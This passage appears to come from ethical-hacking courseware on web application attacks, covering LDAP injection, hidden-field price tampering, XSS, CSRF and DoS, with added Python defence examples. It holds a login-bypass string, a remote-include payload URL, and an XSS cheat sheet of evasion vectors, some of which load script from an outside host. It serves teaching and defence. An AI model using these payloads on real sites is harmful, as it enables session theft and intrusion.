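The fix for the require($drink . '.php') pattern above is to never build the include path from the parameter at all, as this added example shows (it is not the module's code): the DRINK value is matched against an allowlist of the two options the form offers and mapped to a fixed file name. The include directory and the request labels are assumptions.

```python
import posixpath
import re
from urllib.parse import urlsplit

# Constructed allowlist mirroring the two <option> values the form offers;
# the include directory is an assumed location for the trusted scripts.
ALLOWED_DRINKS = {"pepsi", "coke"}
INCLUDE_DIR = "/var/www/includes"

# A bare token: letters, digits, underscore. No '/', '.' or ':' so neither a
# path nor a URL can pass even before the allowlist is consulted.
TOKEN_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def resolve_include(drink_param, default="coke"):
    """Return the local script path for DRINK, or None to refuse the request.

    Unlike require($drink . '.php'), the parameter never becomes a path: it is
    matched against the allowlist and then mapped to a fixed file name.
    """
    value = default if drink_param is None else drink_param
    if not TOKEN_RE.match(value) or value not in ALLOWED_DRINKS:
        return None
    return posixpath.join(INCLUDE_DIR, value + ".php")


def classify_request(drink_param):
    """Label a DRINK value for logging: ok, remote-url, path, or unknown."""
    if drink_param is None:
        return "ok"
    if urlsplit(drink_param).scheme in ("http", "https", "ftp"):
        return "remote-url"            # the slide's jasoneval.com payload
    if "/" in drink_param or "\\" in drink_param or ".." in drink_param:
        return "path"                  # local-file variant of the same flaw
    return "ok" if resolve_include(drink_param) else "unknown"


if __name__ == "__main__":
    for sample in [None, "pepsi", "sprite", "../../etc/passwd",
                   "http://jasoneval.com/exploit?"]:
        print(repr(sample), classify_request(sample), resolve_include(sample))
```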


What Is LDAP Injection?

• An LDAP injection technique is used to take advantage of non-validated web application input vulnerabilities to pass LDAP filters used for searching Directory Services to obtain direct access to databases behind an LDAP tree
• LDAP Directory Services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries
• LDAP is based on the client-server model and clients can search the directory entries using filters

Filter syntax: (attributeName operator value)

Operator   Example
=          (objectclass=user)
>=         (mdbStorageQuota>=100000)
<=         (mdbStorageQuota<=100000)
~=         (displayName~=Foeckeler)
*          (displayName=*John*)
AND (&)    (&(objectclass=user)(displayName=John))
OR (|)     (|(objectclass=user)(displayName=John))
NOT (!)    (!(objectClass=group))


What is LDAP Injection?

An LDAP (Lightweight Directory Access Protocol) injection attack works in the same way as a SQL injection attack. All the inputs to the LDAP must be properly filtered; otherwise, vulnerabilities in LDAP allow executing unauthorized queries or modification of the contents. LDAP attacks exploit web-based applications constructed based on LDAP statements by using a local proxy. LDAP statements are modified when certain applications fail. These services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. It is based on the client-server model, and clients can search the directory entries using filters.


How LDAP Injection Works

Figure: the Client sends a Normal Query to the LDAP Server and receives a Normal Result; with Normal Query + Code Injection the Client receives the Normal Result and/or Additional Information

• LDAP injection attacks are similar to SQL injection attacks but exploit user parameters to generate the LDAP query
• To test if an application is vulnerable to LDAP code injection, send a query to the server that generates an invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques

Account Login:
    Username: juggyboy)(&))
    Password: blah
    Submit

If an attacker enters the valid user name "juggyboy" and injects juggyboy)(&)), then the URL string becomes (&(USER=juggyboy)(&))(PASS=blah)). Only the first filter is processed by the LDAP server, i.e., only the query (&(USER=juggyboy)(&)) is processed. This query is always true, and the attacker logs into the system without a valid password.


How LDAP Injection Works

LDAP injection attacks are commonly used on web applications. LDAP injection applies to any application that has some kind of user input used to generate LDAP queries. To test if an application is vulnerable to LDAP code injection, send a query to the server that generates an invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques.

Depending upon the implementation of the target, one can try to achieve:

• Login Bypass

• Information Disclosure

• Privilege Escalation

• Information Alteration
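The defence for the login filter shown on the slide is to escape the special characters of the filter grammar (RFC 4515) in every user-supplied value before concatenation, and to reject any filter that is not a single well-formed group. This is an added example, not the module's code; the filter template (&(USER=...)(PASS=...)) is the slide's, and the validator is a constructed structural check, not an LDAP library.

```python
# RFC 4515 escape sequences for characters that are special inside a filter value.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value):
    """Escape user input so it can only ever be matched as a literal value."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_vulnerable(user, password):
    """The slide's construction: raw concatenation into the filter text."""
    return "(&(USER=" + user + ")(PASS=" + password + "))"


def build_login_filter_safe(user, password):
    """Hardened: every special character in both inputs is escaped first."""
    return ("(&(USER=" + escape_filter_value(user)
            + ")(PASS=" + escape_filter_value(password) + "))")


def well_formed(filter_text):
    """Structural check a server-side validator can run before sending a filter.

    A single filter is exactly one parenthesised group: parentheses balance and
    the first time depth returns to zero must be the last character. Escaped
    pairs such as \\29 are skipped so they are not counted as structure.
    """
    depth = 0
    i = 0
    while i < len(filter_text):
        ch = filter_text[i]
        if ch == "\\":
            i += 3                      # backslash plus two hex digits
            continue
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
            if depth == 0 and i != len(filter_text) - 1:
                return False            # text continues after the group closed
        i += 1
    return depth == 0


if __name__ == "__main__":
    user, pwd = "juggyboy)(&))", "blah"   # the slide's injected username
    raw = build_login_filter_vulnerable(user, pwd)
    safe = build_login_filter_safe(user, pwd)
    print(raw, well_formed(raw))      # the injected group closes early: rejected
    print(safe, well_formed(safe))    # escaped: one group, the value stays literal
```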


Hidden Field Manipulation Attack

HTML Code:

    <form method="post" action="page.aspx">
    <input type="hidden" name="PRICE" value="200.00">
    Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
    Product price: 200.00<br>
    <input type="submit" value="submit">
    </form>

Rendered form: Product Name [Juggyboy Shirt], Product Price [200], Submit

Normal Request:
    http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00

Attack Request:
    http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00

• When a user makes selections on an HTML page, the selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST)
• HTML can also store field values as hidden fields, which are not rendered to the screen by the browser, but are collected and submitted as parameters during form submissions
• Attackers can examine the HTML code of the page and change the hidden field values in order to change post requests to the server


Hidden Field Manipulation Attack

Hidden field manipulation attacks are mostly used against e-commerce websites today. Many online stores face these problems. In every client session, developers use hidden fields to store client information, including the price of the product (including discount rates). At the time of development of such programs, developers feel that all the applications developed by them are safe, but a hacker can manipulate the price of the product and complete a transaction with the price that he or she has altered, rather than the actual price of the product.

For example: On eBay, a particular mobile phone is for sale for $1000 and the hacker, by altering the price, gets it for only $10.

This is a huge loss for website owners. To protect their networks from attacks, website owners are using the latest antivirus software, firewalls, intrusion detection systems, etc. If their website is attacked, it often also loses its credibility in the market.

When any target requests web services and makes choices on the HTML page, the choices are saved as form field values and delivered to the requested application as an HTTP request (GET or POST). HTML pages generally save field values as hidden fields; they are not displayed on the target's monitor but are saved and placed in the form of strings or parameters at the time of form submission. Attackers can examine the HTML code of the page and change the hidden field values in order to change post requests to the server.

    <input type="hidden" name="PRICE" value="200.00">
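What the server should do with the PRICE field above, and with any tampered URL parameter from the Parameter/Form Tampering section, as an added example that is not the module's code: the price is ignored and looked up server-side, and any value that genuinely must round-trip through a hidden field is HMAC-signed so tampering is detected. The catalogue, secret and request strings are constructed for the demo.

```python
import hashlib
import hmac
from urllib.parse import parse_qs

# Constructed server-side catalogue: the only source of truth for prices.
CATALOGUE = {"Juggyboy Shirt": "200.00"}

# Assumed server-held secret for signing any value that must round-trip via a hidden field.
SERVER_SECRET = b"constructed-secret-change-me"


def price_from_request_vulnerable(query):
    """Trusts the client's price parameter, as the slide's page.aspx does."""
    return parse_qs(query)["price"][0]


def price_from_request_safe(query):
    """Ignore any client-supplied price; look the product up server-side."""
    product = parse_qs(query).get("product", [""])[0]
    if product not in CATALOGUE:
        raise ValueError("unknown product: %r" % product)
    return CATALOGUE[product]


def sign_hidden_field(name, value):
    """HMAC tag to carry beside a hidden field whose value really must round-trip."""
    msg = (name + "=" + value).encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def verify_hidden_field(name, value, tag):
    """Constant-time check that the field came back unmodified."""
    return hmac.compare_digest(sign_hidden_field(name, value), tag)


def demo():
    normal = "product=Juggyboy%20Shirt&price=200.00"     # the slide's normal request
    tampered = "product=Juggyboy%20Shirt&price=2.00"     # the slide's attack request
    tag = sign_hidden_field("PRICE", "200.00")           # issued when the form was rendered
    return {
        "vulnerable_normal": price_from_request_vulnerable(normal),
        "vulnerable_tampered": price_from_request_vulnerable(tampered),
        "safe_normal": price_from_request_safe(normal),
        "safe_tampered": price_from_request_safe(tampered),
        "hmac_intact": verify_hidden_field("PRICE", "200.00", tag),
        "hmac_tampered": verify_hidden_field("PRICE", "2.00", tag),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```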


• Cross-site scripting ('XSS' or 'CSS') attacks exploit vulnerabilities in dynamically generated web pages, which enables malicious attackers to inject client-side script into web pages viewed by other users
• It occurs when invalidated input data is included in dynamic content that is sent to a user's web browser for rendering
• Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests

Possible outcomes:
    Malicious script execution          Session hijacking
    Redirecting to a malicious server   Brute force password cracking
    Exploiting user privileges          Data theft
    Ads in hidden IFRAMES and pop-ups   Intranet probing
    Data manipulation                   Keylogging and remote monitoring

C o p y r ig h t © b y E&C01nal.A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d

Cross-Site Scripting (XSS) Attacks

Cross-site scripting is abbreviated XSS (the older abbreviation 'CSS' is avoided today because it collides with Cascading Style Sheets). XSS vulnerabilities occur when a web application takes input from a user and includes it, unvalidated and unencoded, in dynamic content that is sent to another user's browser for rendering. An attacker can then use that input to deliver malicious JavaScript, VBScript, ActiveX, HTML, or Flash to end users, hidden inside an apparently legitimate request or stored page, and the victim's browser executes it on the attacker's behalf. The end user trusts the web application, and the attacker exploits that trust to perform actions in the user's browser and session that would not be allowed under normal conditions. Attackers often encode the malicious portion of the tag (for example with Unicode, HTML entities or URL encoding) so that the request looks genuine to the user and slips past naive filters. Consequences of a successful XSS attack include:

• Malicious script execution

• Session hijacking

• Brute force password cracking

• Redirecting to a malicious server

• Exploiting user privileges

• Data theft

• Intranet probing

• Ads in hidden IFRAMES and pop-ups

• Data manipulation

• Keylogging and remote monitoring



How XSS Attacks Work

To understand how cross-site scripting is typically exploited, consider the following hypothetical example.

Normal Request:
    http://juggyboy.com/jason_file.html

Server Response:
    404 Not found
    /jason_file.html

Server Code (handles requests for a nonexistent page, a classic 404 error page):
    <html>
    <body>
    <?php
    print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
    ?>
    </body>
    </html>

XSS Attack Code:
    http://juggyboy.com/<script>alert("WARNING: The application has encountered an error");</script>

Server Response: the page echoes the requested URI into the HTML without encoding it, so the response contains the <script> element verbatim and the browser executes it.

FIGURE 13.15: How XSS Attacks Work
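The same 404 page in Python, as an added example rather than the module's own code: vulnerable_404 reproduces the PHP behaviour, hardened_404 applies HTML output encoding before the reflected value is concatenated into the page. The request URIs are constructed from the figure's normal and attack requests, URL-encoded the way a browser would send them.

```python
import html
from urllib.parse import unquote

# Constructed request URIs: the benign one and the attack URL from the figure,
# percent-encoded as a browser transmits it.
BENIGN_URI = "/jason_file.html"
ATTACK_URI = ("/%3Cscript%3Ealert(%22WARNING:%20The%20application%20has%20"
              "encountered%20an%20error%22);%3C/script%3E")


def vulnerable_404(request_uri):
    """Equivalent of the PHP page: the decoded URI is concatenated straight
    into the HTML, so any markup in it becomes part of the document."""
    return "<html><body>Not found: " + unquote(request_uri) + "</body></html>"


def hardened_404(request_uri):
    """Same page with output encoding for the HTML body context. quote=True
    also converts the quote characters to entities, so the same function is
    safe when the value is reflected inside a double-quoted attribute."""
    return ("<html><body>Not found: "
            + html.escape(unquote(request_uri), quote=True)
            + "</body></html>")


def has_live_script_tag(page):
    """Comparison helper: an unescaped <script> element in the markup means
    the browser will execute it; an entity-encoded one is just text."""
    return "<script>" in page.lower()
```

Encoding is context-specific: html.escape is right for text nodes and quoted attributes, but a value placed inside a script block, a URL or a CSS property needs the encoder for that context. A Content-Security-Policy header that forbids inline script limits the damage when an encoding is missed somewhere else in the application.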



Cross-Site Scripting Attack Scenario: Attack via Email

In a cross-site scripting attack via email, the attacker crafts an email that contains a link carrying a malicious script and sends it to the victim.

Malicious Script:
<A HREF=http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>

When the user clicks on the link, the URL is sent to legitimateSite.com with the malicious code in the clientprofile parameter.

The server reflects the value of clientprofile into the page it sends back to the user, so the malicious code is executed in the client's browser, in the security context of legitimateSite.com rather than of the attacker's site.

The following diagram depicts the cross-site scripting attack via email step by step:



XSS Example: Attack via Email

The following are the steps involved in an XSS attack via email:

1. Construct a malicious link:

<A HREF=http://juggyboybank.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>

2. Email the URL to the user and convince the user to click on it.

3. The user's browser requests the page from the legitimate server (juggyboybank.com), with the script in the clientprofile parameter.

4. The legitimate server sends back a response page that reflects the parameter, and so contains the malicious script.

5. The malicious script runs in the user's browser, with access to the user's session on juggyboybank.com.



XSS Example: Stealing Users' Cookies

To steal a user's cookies with the help of an XSS attack, the attacker looks for an XSS vulnerability and then plants a cookie stealer (cookie logger): a script that reads the browser's document.cookie and sends its value to a server the attacker controls.

The following are the steps involved in stealing a user's cookies with the help of an XSS attack:

1. The attacker plants the malicious script in a page the victim will load. The diagram shows it served from the attacker's own host; in a stored XSS the page belongs to the vulnerable site itself, which is what lets the script read that site's cookies.

2. The user visits the page.

3. The server sends the response as HTML containing the malicious script.

4. The user's browser runs the malicious script.

5. The cookie logger in the malicious script collects the user's cookies.

6. The malicious script redirects the user to the attacker's server, with the harvested cookie values placed in the redirect URL (a browser never attaches the victim site's cookies to a request for the attacker's domain on its own).

7. The user's browser sends that request, and the attacker's server logs the cookies it carries.
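The cookie logger above works only because the script can read document.cookie. As an added example, not from the module, here is how a Python application would issue its session cookie so that the value is out of reach of script (HttpOnly), never sent over plaintext HTTP (Secure) and not attached to cross-site requests (SameSite=Strict), together with the check a tester runs on a captured Set-Cookie header. The SESSIONID name and the sample header strings are constructed for the example.

```python
from http.cookies import SimpleCookie

# Attributes a session cookie should carry; names are compared case-insensitively.
REQUIRED_ATTRIBUTES = ("secure", "httponly", "samesite")


def build_session_cookie(session_id, domain=None):
    """Set-Cookie value for a session identifier. HttpOnly keeps the value out
    of document.cookie (so the page's cookie logger gets nothing), Secure keeps
    it off plaintext HTTP, SameSite=Strict stops the browser sending it with
    requests that originate from another site."""
    cookie = SimpleCookie()
    cookie["SESSIONID"] = session_id
    morsel = cookie["SESSIONID"]
    morsel["path"] = "/"
    morsel["httponly"] = True
    morsel["secure"] = True
    morsel["samesite"] = "Strict"
    if domain:
        morsel["domain"] = domain
    return cookie.output(header="").strip()


def audit_set_cookie(header_value):
    """Parse a Set-Cookie value as seen in a captured response and return the
    protective attributes that are missing or weakened."""
    parts = [p.strip() for p in header_value.split(";")]
    attrs = {}
    for part in parts[1:]:            # parts[0] is name=value
        name, _, value = part.partition("=")
        attrs[name.strip().lower()] = value.strip()
    missing = [a for a in REQUIRED_ATTRIBUTES if a not in attrs]
    if attrs.get("samesite", "").lower() == "none":
        missing.append("samesite=None offers no cross-site protection")
    return missing
```

HttpOnly does not stop the script from acting as the user while the page is open (it can still issue requests that carry the cookie), so it limits cookie theft rather than XSS itself; the fix for XSS remains output encoding.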



XSS Example: Sending an Unauthorized Request

Using an XSS attack, the attacker can also make the victim's browser send a request the victim never intended. The following are the steps involved in an XSS attack intended to send an unauthorized request:

1. The attacker constructs a malicious link.

2. The attacker sends an email containing the URL to the user and convinces the user to click on it.

3. The user's browser sends a request for the page to the attacker's server.

4. The attacker's server, in response to the user's request, sends the page with the malicious script.

5. The user's browser runs the malicious script.

6. The malicious script sends a request on the user's behalf. The target application accepts it as authorized because it arrives with the user's session, but the user did not intend it, which is what makes it an unauthorized action.



XSS Attack in a Blog Posting

The following diagram depicts the XSS attack in a blog posting:

The attacker adds a malicious script in the comment field of a blog post. The malicious code

<script>onload=window.location='http://www.juggyboy.com'</script>

is injected into the blog post. The comment with the malicious link is stored on the server (database server). When a user views the post, the web application serves the stored comment, and the user is redirected to the malicious website juggyboy.com.

FIGURE 13.20: XSS Attack in a Blog Posting


XSS Attack in Comment Field

The user visits the website: a "Tech Post" blog page ("Facebook acquires file-sharing service ...") with a comment form, where an existing comment reads "Jason, I love your blog post! - Mark (mark@miccasoft.com)". Into the "Leave your comment" field the attacker submits the malicious code

<script>alert("Hello World")</script>

which is injected into the blog post. The comment with the malicious script is stored on the server (database server); the web application serves it to every visitor, and the alert pops up in a popup window as soon as the web page is loaded.

XSS Attack in a Comment Field

Many web applications use HTML pages that dynamically accept data from different sources, and the content of the page changes according to the request. Attackers abuse this by submitting a malicious script through the comments feature, so that it is stored alongside the legitimate comments. When any visitor loads the page containing that comment, the application renders the stored script as part of the page and the visitor's browser executes it, without any further interaction from the visitor, carrying out whatever actions the script was written to perform.


XSS Cheat Sheet

The vectors below originate from the ha.ckers.org XSS cheat sheet; ha.ckers.org stands for a host the attacker controls.

XSS locator: '';!--"<XSS>=&{()}

Normal XSS JavaScript injection: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Image XSS: <IMG SRC="javascript:alert('XSS');">

No quotes and no semicolon: <IMG SRC=javascript:alert('XSS')>

Case insensitive XSS attack vector: <IMG SRC=JaVaScRiPt:alert('XSS')>

HTML entities: <IMG SRC=javascript:alert(&quot;XSS&quot;)>

Grave accent obfuscation: <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

Malformed IMG tags: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">

Embedded tab (a literal TAB character inside the word javascript): <IMG SRC="jav	ascript:alert('XSS');">

Embedded encoded tab: <IMG SRC="jav&#x09;ascript:alert('XSS');">

Embedded newline: <IMG SRC="jav&#x0A;ascript:alert('XSS');">

Embedded carriage return: <IMG SRC="jav&#x0D;ascript:alert('XSS');">

Null chars: perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

Non-alpha-non-digit XSS: <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Non-alpha-non-digit part 2 XSS: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

Extraneous open brackets: <<SCRIPT>alert("XSS");//<</SCRIPT>

No closing script tags: <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>

Protocol resolution in script tags: <SCRIPT SRC=//ha.ckers.org/.j>

Half open HTML/JavaScript XSS vector: <IMG SRC="javascript:alert('XSS')"

Double open angle brackets: <iframe src=http://ha.ckers.org/scriptlet.html <

XSS with no single quotes or double quotes or semicolons: <SCRIPT>alert(/XSS/.source)</SCRIPT>

Escaping JavaScript escapes: \";alert('XSS');//

End title tag: </TITLE><SCRIPT>alert("XSS");</SCRIPT>

INPUT image: <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

IMG Dynsrc: <IMG DYNSRC="javascript:alert('XSS')">

IMG lowsrc: <IMG LOWSRC="javascript:alert('XSS')">

BGSOUND: <BGSOUND SRC="javascript:alert('XSS');">

LAYER: <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>

STYLE sheet: <LINK REL="stylesheet" HREF="javascript:alert('XSS');">

Local .htc file: <XSS STYLE="behavior: url(xss.htc);">

VBscript in an image: <IMG SRC='vbscript:msgbox("XSS")'>

Mocha: <IMG SRC="livescript:[code]">

US-ASCII encoding: ¼script¾alert(¢XSS¢)¼/script¾

META: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

TABLE: <TABLE BACKGROUND="javascript:alert('XSS')">

TD: <TABLE><TD BACKGROUND="javascript:alert('XSS')">

FIGURE 13.22: XSS Cheat Sheet (the same vectors as listed above, shown as an image)
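What the cheat sheet vectors and the comment-field attack have in common is that they defeat filters which look for a fixed string. As an added example (not from the module), the Python below runs a naive substring blacklist and a normalising detector over constructed inputs: a benign blog comment plus vectors copied from the sheet, with a double-URL-encoded one added to show why decoding has to be repeated until stable. The detector is a monitoring heuristic of the kind a WAF rule or a log triage script uses, not a replacement for output encoding.

```python
import html
import re
from urllib.parse import unquote

# Constructed inputs: one benign comment and vectors from the cheat sheet above
# (the double-encoded entry is added for this example).
SAMPLES = {
    "benign": "Jason, I love your blog post!",
    "plain": "<script>alert('XSS')</script>",
    "encoded_tab": "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
    "case_urlenc": "%3CIMG%20SRC%3DJaVaScRiPt%3Aalert%28%27XSS%27%29%3E",
    "double_enc": "%253Cscript%253Ealert(1)%253C/script%253E",
    "nonalpha_handler": r'<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>',
}

# A case-sensitive substring blacklist of the kind found in legacy filters.
NAIVE_BLACKLIST = ("<script", "javascript:")


def naive_filter_flags(text):
    """True if any blacklisted literal appears verbatim in the raw input."""
    return any(bad in text for bad in NAIVE_BLACKLIST)


def normalize(text):
    """Canonicalise the input roughly the way a browser will before it
    tokenises the markup: URL-decode until stable, decode HTML entities,
    drop embedded TAB/LF/CR/NUL, and fold case."""
    prev = None
    while prev != text:
        prev, text = text, unquote(text)
    text = html.unescape(text)
    text = re.sub(r"[\t\r\n\x00]", "", text)
    return text.lower()


PATTERNS = [re.compile(p) for p in (
    r"<\s*script",                   # script element, incl. <SCRIPT/XSS ...>
    r"\b(java|vb|live)script\s*:",   # scripting URL schemes in SRC/HREF/url()
    r"<[^>]*\bon\w+\s*=",            # inline event handler such as onload=
)]


def normalized_flags(text):
    """True if any pattern matches the canonicalised input."""
    norm = normalize(text)
    return any(p.search(norm) for p in PATTERNS)
```

The normalising detector catches the tab, case and double-encoding tricks that the blacklist misses, but it still does not match the onload!#$%... handler vector, and the sheet has many more like it. That asymmetry is the practical lesson of the cheat sheet: detection rules are for visibility, while the fix is encoding every reflected value for the context it lands in.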


Cross-Site Request Forgery (CSRF) Attack

Cross-Site Request Forgery (CSRF) attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend

The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity

Diagram (User, Trusted Website, Malicious Website):

1. The user logs in to the trusted site and creates a new session

2. The trusted site stores the session identifier for the session in a cookie in the web browser

3. The malicious website sends a request from the user's browser to the trusted site using his session cookie

Cross-site Request Forgery (CSRF) Attack

Cross-site request forgery is also known as a one-click attack (or session riding). CSRF occurs when a user's web browser is instructed, through a malicious web page, to send a request to the vulnerable website. CSRF vulnerabilities are very commonly found on financial websites. Corporate intranets usually can't be reached by outside attackers directly, but the browser of an employee who is logged in to an intranet application and also visits an attacker's page can reach them, so CSRF is one of the ways into such a network. A web application is exposed to CSRF when it cannot distinguish a request issued by malicious code from a request the user genuinely intended to make.

Cross-site request forgery (CSRF) attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend. The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity.


How CSRF Attacks Work

In a cross-site request forgery attack, the attacker waits for the user to have an authenticated session with the trusted server and then tricks the user into opening a malicious page or clicking a malicious link that carries a forged request (for example an auto-submitting form, or an image tag whose URL is the target action). The user's browser sends the forged request to the trusted server and, because the browser attaches the user's session cookie automatically, the server carries out the action as if the user had requested it. No code of the attacker's runs on the trusted server; the attack abuses the server's willingness to act on any request that arrives with a valid session. The following diagram explains the step-by-step process of a CSRF attack:
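The exchange above and the two defences that break it, as an added example in Python (not the module's own code): the vulnerable handler honours any request that carries a logged-in session; the hardened one also requires a synchronizer token that a cross-site page cannot read, and an Origin (or Referer) header that names the trusted site. The juggyboybank.com origin, the session dictionary, the form field names and the attacker's page are assumptions constructed for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed origin of the trusted site (the module's diagrams use juggyboybank.com).
TRUSTED_ORIGIN = "https://juggyboybank.com"


def vulnerable_transfer_allowed(session, form):
    """The pattern CSRF exploits: a logged-in session cookie is the only
    check, and the browser attaches that cookie to a forged request too."""
    return "user" in session and "to" in form and "amount" in form


def issue_csrf_token(session):
    """Per-session synchronizer token. Embed it in a hidden form field or a
    custom header; a page on another origin cannot read it, so it cannot
    reproduce it in a forged request."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def same_origin(headers):
    """Origin (Referer as fallback) must name the trusted site. A missing
    header fails closed for state-changing requests."""
    value = headers.get("Origin") or headers.get("Referer")
    if not value:
        return False
    parts = urlsplit(value)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def hardened_transfer_allowed(session, headers, form):
    """Session, origin and token must all check out; the token comparison is
    constant-time so the check itself leaks nothing."""
    if "user" not in session or not same_origin(headers):
        return False
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False
    if not hmac.compare_digest(expected, supplied):
        return False
    return "to" in form and "amount" in form


def forged_request():
    """What the malicious site's auto-submitting form produces in the victim's
    browser: the bank's session cookie is attached by the browser, the Origin
    is the attacker's page, and there is no token. Constructed for the test."""
    headers = {"Origin": "https://evil.example"}
    form = {"to": "attacker-account", "amount": "1000"}
    return headers, form
```

A SameSite=Strict (or Lax) attribute on the session cookie removes the cookie from the forged request in the first place and is the cheapest layer to add; the token and origin checks remain because not every client honours SameSite and because same-site subdomains or XSS can still originate requests.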


Web Application Denial-of-Service (DoS) Attack

Attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling out large image files or requesting dynamic pages that require expensive search operations on the backend database servers

Why are applications vulnerable?
• Reasonable use of expectations
• Application environment bottlenecks
• Implementation flaws
• Poor data validation

Web server resource consumption targets: CPU, memory and sockets; disk bandwidth; database bandwidth; worker processes

Web services unavailability: application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as those of legitimate clients, which makes them hard for network-level DoS protection measures to tell apart from legitimate traffic

Web Application Denial-of-Service (DoS) Attack

Denial-of-service attacks happen when legitimate users are prevented from performing a desired task or operation. Attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling out large image files or requesting dynamic pages that require expensive search operations on the backend database servers.

The following issues make web applications vulnerable:

• Reasonable use of expectations

• Application environment bottlenecks

• Implementation flaws

• Poor data validation

Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as those of legitimate clients. Each request is individually valid; only their volume and the cost of serving them is abnormal, which makes them hard to distinguish from legitimate traffic for DoS protection that works at the network level. In a web application denial-of-service attack the attacker targets and tries to exhaust CPU, memory, sockets, disk bandwidth, database bandwidth, and worker processes.

Some of the common ways to perform a web application DoS attack are:

• Bandwidth consumption - flooding a network with data


Denial-of-Service (DoS) Examples

User Registration DoS: The attacker could create a program that submits the registration forms repeatedly, adding a large number of spurious users to the application

Login Attacks: The attacker may overload the login process by continually sending login requests that require the presentation tier to access the authentication mechanism, rendering it unavailable or unreasonably slow to respond

User Enumeration: If the application states which part of the username/password pair is incorrect, an attacker can automate the process of trying common user names from a dictionary file to enumerate the users of the application

Account Lock Out Attacks: The attacker may enumerate user names through another vulnerability in the application and then attempt to authenticate to the site using valid user names and incorrect passwords, which will lock out the accounts after the specified number of failed attempts. At this point legitimate users will not be able to use the site

Denial-of-Service (DoS) Example

Most web applications are designed to serve, or withstand, a limited number of concurrent requests. If that limit is exceeded, the web application may fail to serve the additional requests. Attackers take advantage of this to launch denial-of-service attacks on web applications: they send requests to the web application until its resources are exhausted, and once it is saturated it stops responding to other requests, even those sent by authorized users, because the attacker has flooded it with bogus requests. Various web application DoS attacks include:

• User Registration DoS: The attacker could create a program that submits the registration forms repeatedly, adding a large number of spurious users to the application.

• Login Attacks: The attacker overloads the login procedure by repeatedly sending login requests, each of which forces the presentation tier to accept the request and invoke the authentication mechanism. When enough of these requests are in flight, the process becomes slow or unavailable to genuine users.

• User Enumeration: When the application responds to a failed authentication attempt with an error message that says which part of the username/password pair was wrong, the attacker can automate the procedure, trying common user names from a dictionary file to enumerate the valid users of the application.
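The user enumeration and account lockout examples are two sides of the same login handler, so one added Python example (not the module's own code) serves both: leaky_login is the flawed version, and hardened_login returns a single generic failure message, always performs the password hash so that response time does not reveal whether the account exists, and throttles by source address with a sliding window instead of locking the account, so an attacker who knows a valid user name cannot deny that user service. The user store, password, salt, iteration count and the limits are assumptions constructed for the example.

```python
import hashlib
import hmac
import os
from collections import defaultdict, deque

# Constructed user store: one account with a PBKDF2-hashed password. User name,
# password, salt and iteration count are assumptions for this example.
ITERATIONS = 10_000


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


_SALT = os.urandom(16)
USERS = {"shaun": (_SALT, _hash("correct horse", _SALT))}
# Dummy record so an unknown user name costs the same hash computation as a
# real one; otherwise response time alone would enumerate accounts.
_DUMMY = (os.urandom(16), _hash("unused", os.urandom(16)))


def check_password(username, password):
    salt, stored = USERS.get(username, _DUMMY)
    computed = _hash(password, salt)          # always computed, known user or not
    return username in USERS and hmac.compare_digest(computed, stored)


def leaky_login(username, password):
    """The enumeration flaw: the error says which half of the pair was wrong,
    so a dictionary of common user names reveals which ones exist."""
    if username not in USERS:
        return "no such user"
    if not check_password(username, password):
        return "incorrect password"
    return "ok"


class SlidingWindowLimiter:
    """At most max_attempts per key in any window of `window` seconds. Keyed by
    client address, not by account, so a flood of bad passwords against one
    user name throttles the sender instead of locking the victim out."""

    def __init__(self, max_attempts, window):
        self.max_attempts = max_attempts
        self.window = window
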